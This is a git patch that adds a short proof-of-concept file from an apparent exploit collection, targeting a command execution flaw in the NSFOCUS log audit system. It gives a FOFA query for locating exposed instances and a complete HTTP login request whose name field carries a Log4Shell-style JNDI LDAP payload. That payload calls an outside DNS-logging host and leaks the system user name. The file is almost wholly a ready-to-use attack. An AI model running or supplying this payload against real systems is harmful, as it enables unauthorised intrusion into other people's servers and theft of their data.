From 1781ac11adc47f367f22ad3fabf75b0f96c72122 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Tue, 5 Mar 2024 16:02:34 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=BB=BF=E7=9B=9F=E6=97=A5=E5=BF=97?= =?UTF-8?q?=E5=AE=A1=E8=AE=A1=E7=B3=BB=E7=BB=9F=E5=AD=98=E5=9C=A8=E5=91=BD?= =?UTF-8?q?=E4=BB=A4=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 绿盟日志审计系统存在命令执行漏洞.md | 32 +++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 绿盟日志审计系统存在命令执行漏洞.md diff --git a/绿盟日志审计系统存在命令执行漏洞.md b/绿盟日志审计系统存在命令执行漏洞.md new file mode 100644 index 0000000..1aca98e --- /dev/null +++ b/绿盟日志审计系统存在命令执行漏洞.md @@ -0,0 +1,32 @@ +## 绿盟日志审计系统存在命令执行漏洞 + +## fofa +``` +"{{platformName}}" && icon_hash="-1566499661" +``` + +## poc +``` +PUT /api/v1/login HTTP/1.1 +Host: +Connection: keep-alive +Content-Length: 36 +sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122" +Accept: application/json, text/plain, */* +Content-Type: application/json;charset=UTF-8 +Accept-Language: zh_CN +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +sec-ch-ua-platform: "Windows" +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Accept-Encoding: gzip, deflate, br +Cookie: JSESSIONID=C2CBDF46F7B53365D2ECE60AA645B673; sessionid=w0gr7fyrkt56tf6yc3sr0pw6mjl59txi + +{"name":"${jndi:ldap://${sys:user.name}.a24693ffbb.ipv6.1433.eu.org}","password":"2Y4W5F5h"} +``` + +![image](https://github.com/wy876/POC/assets/139549762/a05a8dba-acfc-43d7-88c9-26f8ed6b01be) + +![image](https://github.com/wy876/POC/assets/139549762/8df91e08-41cf-438b-88ed-5a559f20d18c)